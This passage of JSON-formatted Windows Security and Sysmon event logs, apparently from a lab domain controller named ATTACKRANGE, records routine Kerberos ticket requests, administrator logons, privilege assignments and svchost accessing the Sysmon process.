Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6b9c0","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220520,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220521,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220522,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220523,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D011\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d011","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{7A18163F-E95C-A52D-0B51-F7A4B0969AAC}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220524,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D011\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6d011","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4551,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4552,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4553,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4554,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4555,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 